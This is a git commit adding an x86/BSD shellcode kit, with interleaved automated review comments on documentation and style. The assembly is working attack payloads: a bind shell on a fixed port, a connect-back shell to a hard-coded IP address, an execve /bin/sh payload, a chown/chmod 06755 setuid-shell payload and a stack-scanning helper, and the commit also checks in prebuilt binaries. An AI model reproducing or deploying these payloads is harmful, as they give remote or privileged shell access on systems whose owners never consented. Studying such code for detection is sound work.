From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial
---
 other/shellkit/x86_bsd/FIXME_chmod.s | 43 +++++++++++++++++++++++++
 other/shellkit/x86_bsd/bindshell.s | 59 +++++++++++++++++++++++++++++++++++
 other/shellkit/x86_bsd/connectsh | Bin 0 -> 6100 bytes
 other/shellkit/x86_bsd/connectsh.s | 51 ++++++++++++++++++++++++++++++
 other/shellkit/x86_bsd/execvesh | Bin 0 -> 6034 bytes
 other/shellkit/x86_bsd/execvesh.s | 31 ++++++++++++++++++
 other/shellkit/x86_bsd/exit.s | 18 +++++++++++
 other/shellkit/x86_bsd/spset.s | 36 +++++++++++++++++++++
 8 files changed, 238 insertions(+)
 create mode 100644 other/shellkit/x86_bsd/FIXME_chmod.s
 create mode 100644 other/shellkit/x86_bsd/bindshell.s
 create mode 100644 other/shellkit/x86_bsd/connectsh
 create mode 100644 other/shellkit/x86_bsd/connectsh.s
 create mode 100644 other/shellkit/x86_bsd/execvesh
 create mode 100644 other/shellkit/x86_bsd/execvesh.s
 create mode 100644 other/shellkit/x86_bsd/exit.s
 create mode 100644 other/shellkit/x86_bsd/spset.s
(limited to 'other/shellkit/x86_bsd')
diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s
new file mode 100644
index 0000000..6f19d23
--- /dev/null
+++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
+/* x86/BSD PIC local chmod code
+ *
+ * by stealth
+ */
+
+ .globl cbegin
+ .globl cend
+
+cbegin:
+ jmp boomsh
+
+foo: popl %ebx
+ incl (%ebx)
+ incl 4(%ebx)
+
+ xorl %eax, %eax
+ movb %al, 11(%ebx)
+
+ movb $16, %al /* chown */
+ xorl %ecx, %ecx
+ pushl %ecx
+ pushl %ecx
+ pushl %ebx
+ pushl $1
+sys_1: int $0x80
+
+ xorl %eax, %eax /* chmod */
+ movb $15, %al
+ pushw $06755
+ pushl %ebx
+ pushl $1
+sys_2: int $0x80
+
+ xorl %eax, %eax
+ incl %eax /* exit */
+ pushl $1
+sys_3: int $0x80
+
+boomsh: call foo
+ .string ".tmp.boomsh.";
+cend:
+
+ 
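Review bot: The block patches its own trailing `.string` bytes in place (`incl (%ebx)`, `incl 4(%ebx)`, `movb %al, 11(%ebx)`) before handing that buffer to the `sys_1` and `sys_2` traps, so it only runs where the code page is writable — on a W^X text mapping the first `incl` faults — and neither the header nor the `FIXME_` file name says so or names the open issue. Suggest a header comment such as `/* ABI: i386 BSD int $0x80, args on the stack above a dummy return slot; needs writable code bytes because foo patches the string in place */` plus a `FIXME:` line stating what is known to be broken. The syscall numbers `$16`, `$15`, `$1` and the mode `$06755` are bare immediates where `.equ` names would let a reader or a signature author follow the sequence without a syscall table; the `;` after the `.string` directive is a stray statement separator and should go.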
diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s
new file mode 100644
index 0000000..8921fa9
--- /dev/null
+++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
+/* x86/BSD bindsh shellcode (73 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebx, %ebx
+ mull %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ incl %ebx
+ pushl %ebx
+ movb $0x61, %al
+ pushl %ebx
+ int $0x80
+ xchgl %esi, %eax
+ pushl %edx
+ pushw $0x4444
+ pushw %bx
+ movl %esp, %ebp
+ pushl $0x10
+ pushl %ebp
+ pushl %esi
+ pushl %esi
+ pushl $0x68
+ popl %eax
+ int $0x80
+ movb $0x6a, %al
+ int $0x80
+ pusha
+ movb $0x1e, %al
+ int $0x80
+a:
+ pushl %ebx
+ pushl %eax
+ pushl %eax
+ movb $0x5a, %al
+ int $0x80
+ decl %ebx
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh
new file mode 100644
index 0000000..f9aaab7
Binary files /dev/null and b/other/shellkit/x86_bsd/connectsh differ
diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s
new file mode 100644
index 0000000..562f5ef
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh.s
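Review bot: Nothing in the header states the convention every trap here depends on — i386 BSD `int $0x80` reading its arguments from the stack above a dummy return slot, which is why each `int $0x80` is preceded by a throwaway `pushl` rather than register setup — and all syscall numbers and the port are bare immediates (`$0x61`, `$0x68`, `$0x6a`, `$0x1e`, `$0x5a`, `$0x3b`, `$0x4444`). connectsh.s, execvesh.s and exit.s in this commit have the same gap. Suggest a header line `/* ABI: i386 BSD int $0x80; args on stack after a dummy return address; port is a hard-coded immediate */` and `.equ` names for the syscall numbers, so reviewers and detection-signature writers can follow the sequence without a syscall table. Two lines also deserve a why-comment: the unbalanced `pusha` before `a:` intentionally leaves 32 bytes of register copies on the stack, and the `decl %ebx` / `jns a` loop bound comes from `%ebx` being left at 2 by the two earlier `incl %ebx`.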
@@ -0,0 +1,51 @@
+/* x86/BSD connectsh shellcode (66 bytes)
+
+ lorian / teso
+*/
+
+ .globl _cbegin
+ .globl cbegin
+ .globl _cend
+ .globl cend
+
+_cbegin:
+cbegin:
+ xorl %ebp, %ebp
+ mull %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ incl %ebp
+ pushl %ebp
+ movb $0x61, %al
+ pushl %ebp
+ int $0x80
+ xchgl %esi, %eax
+ pushl $0xcab058c3
+ pushw $0x4444
+ pushw %bp
+ movl %esp, %edi
+ pushl $0x10
+ pushl %edi
+ pushl %esi
+ pushl %esi
+ pushl $0x62
+ popl %eax
+ int $0x80
+a: pusha
+ movb $0x5a, %al
+ int $0x80
+ decl %ebp
+ jns a
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha
+ popl %esi
+ popl %esi
+ movb $0x3b, %al
+ int $0x80
+
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh
new file mode 100644
index 0000000..7518768
Binary files /dev/null and b/other/shellkit/x86_bsd/execvesh differ
diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s
new file mode 100644
index 0000000..370e7a4
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
+/* x86/BSD execve /bin/sh shellcode
+ *
+ * lorian / teso
+ */
+
+/* somehow the obsd on plan9 where i tested it, needs the labels
+ * exported with _ before, while freebsd doesnt
+ */
+
+/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
+
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+ pushl $0x3b
+ popl %eax
+ cdq
+ pushl %edx
+ movl %esp, %ebx
+ push $0x68732F6E
+ push $0x69622F2F
+ pusha /* FULLPOWER */
+ pop %esi
+ pop %esi
+ int $0x80
+_cend:
+cend:
diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s
new file mode 100644
index 0000000..7993035
--- /dev/null
+++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
+/* x86/BSD exit shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+_cbegin:
+cbegin:
+
+ xorl %eax, %eax
+ incl %eax
+ int $0x80
+
+_cend:
+cend:
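Review bot: The address in `pushl $0xcab058c3` is a hard-coded immediate that looks like a leftover test value, but the header (a byte count and author only) does not say that it is a placeholder, nor that the port in `pushw $0x4444` is likewise baked in; suggest `/* NOTE: peer address and port are hard-coded immediates left from testing, not parameters */` in the header. This commit also adds the compiled `connectsh` and `execvesh` binaries next to their sources; prebuilt artifacts cannot be reviewed or diffed and should be produced by the build rather than checked in. The loop at `a:` uses `%ebp` as its counter and executes `pusha` on every iteration with no matching pops, which deserves a one-line comment stating that the stack growth is intended.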
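Review bot: `pusha /* FULLPOWER */` is the one non-obvious line in execvesh.s and its comment explains nothing; the `pusha` followed by two `pop %esi` is what lays out the dummy return slot and the three arguments for `int $0x80`, and the comment should say so, e.g. `/* pusha then two pops leaves: dummy ret, path ptr (old esp), argv ptr (ebx), envp (edx=0) */`. The `cdq` zeroing of `%edx` is only correct because `%eax` was just loaded with a small positive value, which is worth a short note. The mixed `push` and `pushl` spellings should be made consistent with the rest of the directory.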
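Review bot: In exit.s the exit status is unspecified: nothing is pushed before `int $0x80`, so the status argument is whatever dword happens to be at `4(%esp)` when the trap fires. If that is intentional the header should say `/* exit status is whatever is on the stack; callers must not rely on it */`; otherwise push a status and a dummy return slot first, as the other files in this directory do before their traps.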
diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
+/* x86 spset shellcode
+ *
+ * lorian / teso
+ */
+ .globl cbegin
+ .globl _cbegin
+ .globl cend
+ .globl _cend
+
+/* searches for 512 bytes "free" space on stack without destroying it
+ * like any kind of call would do...
+ *
+ * NOTE: your real shellcode must be terminated with
+ * \x78\x56\x34\x12 for this code to work...
+ */
+
+_cbegin:
+cbegin:
+
+ movl $0x12345678, %eax
+a:
+ cdq
+ movb $0x02, %dh
+b:
+ popl %ebx
+ pushl %ebx
+ incl %esp
+ decl %edx
+ jz c
+ cmpl %eax, %ebx
+ je a
+ jmp b
+c:
+
+_cend:
+cend:
-- 
cgit v1.3
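Review bot: The scan advances `%esp` one byte at a time (`incl %esp`) and reads a dword at each step, so it reads beyond the current frame and will fault if 512 bytes past the last marker are not mapped, and it may leave `%esp` byte-misaligned at `c:`; the header describes neither risk. It also does not say that `je a` restarts the count — `a:` reloads `%edx` to 0x200 — so the window found is 512 bytes past the last marker occurrence, not the first. Suggest adding to the header `/* walks esp upward a byte at a time; faults if the region is unmapped; esp may be misaligned on exit; the count restarts at every marker hit */`. `$0x12345678` and the `\x78\x56\x34\x12` in the comment are one constant spelled twice; a `.equ SPSET_MARKER, 0x12345678` referenced from both places keeps them in sync.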